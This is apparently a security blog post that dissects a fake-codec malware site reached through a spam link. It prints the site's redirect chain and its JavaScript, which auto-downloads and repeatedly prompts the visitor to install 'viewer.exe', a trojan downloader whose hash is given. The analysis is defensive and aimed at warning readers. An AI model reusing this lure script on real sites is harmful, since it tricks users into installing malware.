[Malware] Dissection of a Fake Codec Malicious Website

Hi,

Today I’ve received a spam mail from peteru.aranka.mark@t-online.de with the subject
“You gotta take a look at this video.” and a link to http://k_CENSORED_y.net/

From this domain we will be redirected to http://79._CENSORED_.18/ that presents
the following HTML:

———————————–
<script type=”text/javascript”>
<!–
window.location = “/uploads”
//–>
</script>
————————————

as suggested by the window.location we postpone /uploads to http://79._CENSORED_.18/

so we land here:

——————–
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href=”http://79._CENSORED_.18/uploads/”>here</a&gt;.</p>
<hr>
<address>Apache/2 Server at 79.1_CENSORED_.18 Port 80</address>
</body></html>
——————-

Get again with Malzilla http://79._CENSORED_.18/uploads/ and finally we land into the
real malicious page.

——————
<html>
<head>
<title>HARDCORE VIDEO ONLINE!</title>
——————

this is really intersting

——————
<script language=”javascript”>
codec_url=’viewer.exe’;
</script>
——————

Sounds like the classic Codec Scam, so let’s see what other does this page..

——————
<script language=”javascript”>

function softdownload()
{
if(window.navigator.userAgent.indexOf(“SV1”) != -1 || window.navigator.userAgent.indexOf(“MSIE 7”) !=-1)
{
return;
}
else
{
window.setTimeout(“location.href='” + codec_url + “‘”, 3000);
}
}

function play() {
if (confirm(‘Click \’OK\’ to download and install media codec.’)) {
window.location.href=codec_url;
}
else {
if (alert(‘Please download new version of media codec software.’)) {
play();
}
else {
play();
}
}
}
——————

The first function checks the UserAgent used by the victim if matches the correct
conditions, assembles the string that constitutes the download url.
The play() function tell to the victim to download and install viewer.exe

This is the fake advertise:

——————
<b>Video ActiveX Object Error:</b><br>

Your browser cannot display this video file.<br><br>
You need to download new version of Video<br>
ActiveX Object to play this video file.
——————

so user is prompted to download the Fake Codec.

Let’s see what is viewer.exe

File:      viewer.exe
Status: INFECTED/MALWARE
MD5:     9eae38ac9c9a97074ce4119d81fa7acf
Packers detected: –

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aggp

So pay attention when you meet Websites that offers strange custom Codecs!😉

See you to the next post..🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: